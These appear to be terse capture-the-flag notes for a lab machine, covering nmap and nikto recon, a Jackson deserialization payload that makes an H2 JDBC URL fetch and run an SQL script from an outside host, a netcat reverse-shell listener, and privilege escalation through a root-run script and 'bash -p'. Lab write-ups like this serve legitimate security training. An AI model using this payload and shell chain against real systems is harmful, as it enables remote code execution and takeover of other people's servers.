Cu3rv0x

nmap -A -p- -oA output 10.129.151.133 --min-rate=10000 --script=vuln --script-imeout=15 -v

nmap -sC -sV -O -p- -oA time 10.129.151.133

nmap -sU -O -p- -oA time-udp 10.129.151.133

nikto -h 10.129.151.133:80

Pasted image 20220203125308.png

Pasted image 20220203125324.png

whatweb http://10.129.151.133

Pasted image 20220203125844.png

http://10.129.151.133/

Pasted image 20220203125918.png

https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

cat inject.sql

sudo python3 -m http.server 80

nc -lvnp 443

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.20:80/inject.sql'"}]

Pasted image 20220203131602.png

find \-perm -4000 2>/dev/null

Pasted image 20220203132419.png

systemctl list-timers

Pasted image 20220203132521.png

cd /dev/shm

cat procmon.sh

Pasted image 20220203133120.png

Pasted image 20220203133250.png

https://github.com/DominicBreuker/pspy/releases

Bajamos pspy64 y lo subimos a la maquina time.htb

./psy64

Pasted image 20220203133940.png

cat /usr/bin/timer_backup.sh

ls -al /usr/bin/timer_backup.sh

ls -l /bin/bash

bash -p

Pasted image 20220203134318.png